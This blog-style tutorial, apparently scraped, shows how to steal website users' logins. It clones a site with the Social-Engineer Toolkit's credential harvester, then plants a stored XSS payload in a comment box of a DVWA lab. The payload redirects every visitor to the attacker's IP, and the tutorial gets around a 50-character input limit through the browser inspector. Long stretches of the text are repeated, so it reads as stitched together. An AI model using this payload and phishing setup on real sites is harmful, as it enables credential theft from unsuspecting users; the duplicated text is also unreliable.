HACKINGS | Cross Site Scripting XSS-4 (hack username and password). LOMBOX
XSS video tutorial
Steps and instructions -
Yo
In this tutorial we will hack username and password with setoolkit from a target website using redirected XSS.
In the previous tutorial I have shown you guys in brief. But today we will conduct a full pen test.
Some terminologies -
XSS - Cross Site Scripting is a process of adding malicious code in a website for exploitation.
Website cloning - Making the exact same duplicate website.
Setoolkit - Social engineering attacking tools set.
Requirements -
* Firefox browser
* A target website to practice the test
Steps -
* Open a terminal and type "setoolkit" to make a cloned website
* Choose website attack vectors by typing 2
* Choose 3 as we are harvesting the credentials
Yo
In this tutorial we will hack username and password with setoolkit from a target website using redirected XSS.
In the previous tutorial I have shown you guys in brief. But today we will conduct a full pen test.
Some terminologies -
XSS - Cross Site Scripting is a process of adding malicious code in a website for exploitation.
Website cloning - Making the exact same duplicate website.
Setoolkit - Social engineering attacking tools set.
Requirements -
* Firefox browser
* A target website to practice the test
Steps -
* Open a terminal and type "setoolkit" to make a cloned website
You will get the Setoolkit console.
* Choose social engineering attack by typing 1
* Choose website attack vectors by typing 2
* Choose 3 as we are harvesting the credentials
* Now we choose site cloner as we want to clone our target. Type 2
You will get a screen like this
* Setoolkit is asking for your IP address to make a fake website
Type in ifconfig in a new terminal to know your IP address and enter that IP in the Set console
Then it will ask us for which website it should clone.
I have a lab running called DVWA which will be my target website today.
* Copy the target url and paste it
This is the target website
After entering the URL, set will start cloning and will ask you to run the apache server. Say "y" ie yes.
The cloning process is done.
* Now we want to insert our malicious codes to do XSS. This will be a redirect XSS.
I will insert my code in sign book. You can add the code anywhere like comment box or a search tab.
This is my insert section ie the sign book
Add the code in the comment box -
<script>window.location="http://192.168.80.131/"</script>
Here,
<script> - to start the script
window.location - is to redirect
192.168.80.131 - your IP address which you had given in setoolkit
</script> - to close the script
Add this exact code in the message tab or comment tab of your target website
As I was adding my code, it wont let me add more characters then 50.
The limit is 50 keys in the comment box.
You will have some website restricting the user to 50 character limit.
We have to bypass this now.
I will right click in the comment tab, you will get the option to "inspect element"
After clicking on the "inspect element" you will get some codes in the sidebar like this.
And as you can see that here it says that maxlength="50"
We will change it to maxlenght="100"
Then after hitting enter you can add 100 characters in the comment tab.
This is rare. But in some websites these are to be found.
There is an alternate method to bypass this. Using Burpsuite.... We can intercept the packets and requests.
I have made a separate tutorial on it. You can find it here
Moving on...
Enter the complete script
* When we hit enter, we will be redirected to our cloned website with our IP address.
Now,
When a user of this website visits and tries to access the the website, he will be redirected to our fake duplicate server site.
When he enters the username and password, like i did
Username - hacking
Password - monks
The password will be saved in the setoolkit folder.
To access the file containing username and password, browse through - computer/var/www/html
Her in this folder you will get the harveter.txt file.
Open that file
Boom baby
That's it for this tutorial guys.
If you have missed the XSS basics, catch them here and here and here
See you guys in the next hack.
But, untill then "Have a safe hack"
You may want to see more tuts -
You will get a screen like this
Type in ifconfig in a new terminal to know your IP address and enter that IP in the Set console
Then it will ask us for which website it should clone.
I have a lab running called DVWA which will be my target website today.
* Copy the target url and paste it
This is the target website
After entering the URL, set will start cloning and will ask you to run the apache server. Say "y" ie yes.
The cloning process is done.
* Now we want to insert our malicious codes to do XSS. This will be a redirect XSS.
I will insert my code in sign book. You can add the code anywhere like comment box or a search tab.
This is my insert section ie the sign book
Add the code in the comment box -
<script>window.location="http://192.168.80.131/"</script>
Here,
<script> - to start the script
window.location - is to redirect
192.168.80.131 - your IP address which you had given in setoolkit
</script> - to close the script
Add this exact code in the message tab or comment tab of your target website
As I was adding my code, it wont let me add more characters then 50.
The limit is 50 keys in the comment box.
You will have some website restricting the user to 50 character limit.
We have to bypass this now.
I will right click in the comment tab, you will get the option to "inspect element"
After clicking on the "inspect element" you will get some codes in the sidebar like this.
And as you can see that here it says that maxlength="50"
We will change it to maxlenght="100"
Then after hitting enter you can add 100 characters in the comment tab.
This is rare. But in some websites these are to be found.
There is an alternate method to bypass this. Using Burpsuite.... We can intercept the packets and requests.
I have made a separate tutorial on it. You can find it here
Moving on...
Enter the complete script
* When we hit enter, we will be redirected to our cloned website with our IP address.
Now,
When a user of this website visits and tries to access the the website, he will be redirected to our fake duplicate server site.
When he enters the username and password, like i did
Username - hacking
Password - monks
The password will be saved in the setoolkit folder.
To access the file containing username and password, browse through - computer/var/www/html
Her in this folder you will get the harveter.txt file.
Open that file
Boom baby
That's it for this tutorial guys.
If you have missed the XSS basics, catch them here and here and here
See you guys in the next hack.
But, untill then "Have a safe hack"
You may want to see more tuts -
Komentar
Posting Komentar